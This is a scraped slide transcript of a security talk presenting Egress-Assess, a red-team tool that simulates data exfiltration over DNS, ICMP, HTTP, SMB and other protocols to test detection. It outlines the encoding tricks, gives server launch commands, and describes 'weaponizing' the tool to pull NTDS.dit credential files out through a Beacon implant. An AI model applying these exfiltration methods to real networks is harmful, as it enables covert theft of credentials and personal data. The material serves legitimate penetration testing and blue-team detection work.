Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Egress-Assess and Owning Data Exfiltration

2,277 views

Published on

This talk discusses how Egress-Assess can be used to help attackers and defenders learn how to exfiltrate data outside of their network over a variety of protocols, describes how data is exfiltrated over different supported protocols, and demonstrates the weaponization of the tool!

Published in: Technology
  • Be the first to comment

Egress-Assess and Owning Data Exfiltration

  1. 1. Egress-Assess and Owning Data Exfiltration Christopher Truncer & Stephan Borosh
  2. 2. Who We Are ● Christopher Truncer (@ChrisTruncer) ○  Veil Framework Developer, Florida State Seminole ● Steve Borosh (@424f424f) ○  U.S. Army Infantry Combat Veteran, bug hunter ● Red Teamers, Pen Testers, and Security Researchers for Veris Group’s Adaptive Threat Division
  3. 3. What’s this talk about? ●  Data Exfiltration Today ○  Motivations and goals ●  Egress-Assess ○  State of the framework ○  Technical discussion of tunneling protocols ○  PowerShell component ○  Developing new modules ●  Tempt the Demo Gods
  4. 4. Modern Day Ownage http://www.ozarksfirst.com/media/lib/184/2/1/c/ 21c76ea6-2da0-4287-90ea-1a156ec78d14/Story.jpg http://i0.wp.com/static.bangordailynews.com/wp-content/ blogs.dir/254/files/2015/02/anthemHACKED-450x338.jpg? quality=90&w=588
  5. 5. Moar Ownage http://epmgaa.media.lionheartdms.com/img/photos/2014/01/13/ Target_t750x550.jpg?626c74b6d570df44fd02ecca30244159e005ff34 http://cbsnews2.cbsistatic.com/hub/i/r/2014/10/03/ e4f01ebf-2679-4336-93fc-010cbf978d1d/thumbnail/ 940x470/1f6caf32404b9d045f81ceb9015694f9/ en100314mason286601640x360.jpg
  6. 6. What’s the target? ●  Home Depot ○  Credit cards and e-mail addresses ●  Anthem ○  SSNs, name, address, income… everything ●  Target ○  Credit cards, names, e-mails, phone numbers ●  JP Morgan ○  Customer account data
  7. 7. Attackers don’t just target this... http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/ 041514_1356_MurderingDe30.png
  8. 8. What’s the point? ●  End Goal - Money/Data ○  !disrupt, ○  !deny, ○  !degrade ○  !destroy (maybe deceive) ○  Not just shells anymore ○  Data - grab it, get it out
  9. 9. ...they target this
  10. 10. Assessment Lifecycle
  11. 11. Attacker C2 Comms
  12. 12. Tradecraft Evolution ●  Pen Tests traditionally exploit vulnerabilities ○  Find and exploit vulnerabilities ○  Assess the security as a point in time ●  Why not add in some exfiltration testing as well? ○  Attackers DO this, why not help prep our customers? ○  Let’s emulate our threats
  13. 13. Our Solution
  14. 14. What does it do? ●  Standard client/server model ●  Simulates data exfiltration ○  Faux social security numbers or credit cards ○  And now real files :) ●  Exfils over multiple protocols
  15. 15. Project Goals ●  Fast to set up for use ●  Minimal (if any) configurations required to work ●  Lightweight and no excessive dependencies ●  Exfiltrate data over different protocols ●  Modular framework that allows easy expansion of capabilities
  16. 16. Project Goals ●  Store all data/files transferred for proof of transfer ○  Stored in a specific directory ○  Time and date stamped for correlation with blue team logs ●  Demonstrate different options for data exfiltration and help test blue team detection capabilties
  17. 17. Tunneling Protocols
  18. 18. Supported Tunneling Protocols ●  Protocols merged into Egress-Assess ●  ICMP ●  SMB ●  DNS ●  DNS_Resolved ●  HTTP ●  HTTPS ●  FTP ●  SFTP
  19. 19. FTP and SFTP ●  Generates faux data and writes it to disk, or transfers a file specified by user ●  Creates FTP or SFTP connection to server and transfers the file to the server ●  If faux data is used, it deletes the file
  20. 20. FTP Transfer
  21. 21. ICMP ●  Takes advantage of ICMP type 8 (echo) ○  Protocol allows you to specify the data used in the echo request ●  Splits data in 1100 byte chunks ●  Base64 encodes data ●  Uses encoded data for the echo
  22. 22. ICMP Transfer
  23. 23. DNS (Direct) ●  Uses DNS TXT records ○  Max 255 bytes ●  Split data into chunks, base64 encode each chunk, send packets directly to Egress-Assess server ●  Multiple limitations when working with DNS ○  Size restrictions, UDP, etc. ■  We’d say a joke, but you might not get it :)
  24. 24. DNS (Direct) Transfer
  25. 25. Direct Comms Woes ●  Other protocol modules work well, but fail when a proxy is required ●  Other tools have shown that DNS can be used as a communications channel ○  Cobalt Strike’s Beacon, dns tunnelling projects (dnscat), etc. ○  Began researching different methods to exfil data via DNS
  26. 26. Why Use DNS ●  “But we don’t allow port 53 out!” ●  Locked down environments can have proxies ●  How many people inspect DNS? ○  How many people only resolve certain domains? ○  Can you block protocol compliant C2 comms or data exfiltration attempts? ●  Customer’s own DNS server FTW!
  27. 27. DNS (Resolved) ●  Resolves local system’s nameserver ●  Send request to system/network nameserver ○  <base64encodeddata>.subdomain.domai n.com ●  Server listens for incoming DNS A record request ○  Grabs record being requested, decodes it, and writes data to disk
  28. 28. http://blog.cobaltstrike.com/2013/06/20/thatll-never-work-we-dont-allow-port-53-out/
  29. 29. DNS Resolved Setup ●  Create DNS A record for your final destination ●  Create NS Record for subdomain, point to A record https://www.christophertruncer.com/exfiltrate-data-via-dns-with-egress- assess/
  30. 30. DNS (Direct) Transfer
  31. 31. More DNS Woes
  32. 32. https://docs.google.com/presentation/d/1HfXVJyXElzBshZ9SYNjBwJf_4MBaho6UcATTFwApfXw/preview?sle=true&slide=id.g2d0184395_097
  33. 33. https://docs.google.com/presentation/d/1HfXVJyXElzBshZ9SYNjBwJf_4MBaho6UcATTFwApfXw/preview? sle=true&slide=id.g34d85052a_00
  34. 34. https://docs.google.com/presentation/d/1HfXVJyXElzBshZ9SYNjBwJf_4MBaho6UcATTFwApfXw/preview?sle=true&slide=id.g34d85052a_00
  35. 35. DNS Info ●  Leads to problems when transferring files ○  Faux data, don’t need to preserve order, or 100% integrity ○  Binary files, this is a problem ●  Currently working on essentially TCP over UDP DNS transfers
  36. 36. Powershell Client
  37. 37. PowerShell all the things ●  Same client modules as Python client ●  Simulate attackers from Windows systems ●  Domain proxy support ●  Deployable through Beacon, Meterpreter, etc..
  38. 38. Get-Help
  39. 39. Beacon Deployment
  40. 40. Beacon HTTP SSN Receive ●  ./Egress-Assess.py --server http ●  Data saved in Egress-Assess/data/(timestamp)web_data.txt
  41. 41. Beacon HTTP SSN Transfer
  42. 42. HTTP Snort Capture
  43. 43. Weaponization NTDS.dit
  44. 44. Setup for SMB Delivery ●  ./Egress-Assess.py --server SMB ●  Shared as //host/data (anonymous read/write) ●  Data saved in Egress-Assess/data/
  45. 45. Delivery Via SMB
  46. 46. SMB NTDS.dit Receive
  47. 47. Module Development
  48. 48. Protocol Modules ●  Used to create Client and Server modules for Egress-Assess ●  The transport mechanism for the generated (or real) data to exfil ●  Eight different modules currently ○  HTTP, HTTPS, FTP, SFTP, SMTP, ICMP, DNS, DNS_Resolved
  49. 49. Client Protocol Modules ●  Single “Protocol” Python Class ●  __init__ method ○  All it needs is a name ○  Access to all CLI options (for username, pass, etc.) ●  transmit method ○  Data to be exfiltrated is passed in, and is used to transfer data
  50. 50. Datatype Modules ●  Modules which create data to be exfiltrated by the framework ●  Currently there are two generators ○  Social Security Numbers ○  Credit Card Numbers ●  But any sort of data can be generated by Egress-Assess and used for exfil
  51. 51. Datatype Module ●  Single “Datatype” Python class ●  __init__ method ○  Give your module a name, description, and “type” of data generated ○  All CLI options passed in to this method ●  generate_data method ○  This method is called to generate and return the data that is to be transferred
  52. 52. Shameless Hiring Plug ●  We’re growing! ●  Want to research cool stuff? ●  Want to work with 13 x OSCPs and 4 x OSCEs? ●  Benefits: Research budget, training budget. ●  Hit us up to join Veris Group’s Adaptive Threat Division!
  53. 53. ? ●  Github ○  https://github.com/ChrisTruncer/Egress-Assess ●  Chris Truncer ○  @ChrisTruncer ○  CTruncer@christophertruncer.com ●  Steve Borosh ○  @424f424f ○  steveborosh@rvrsh3ll.net

×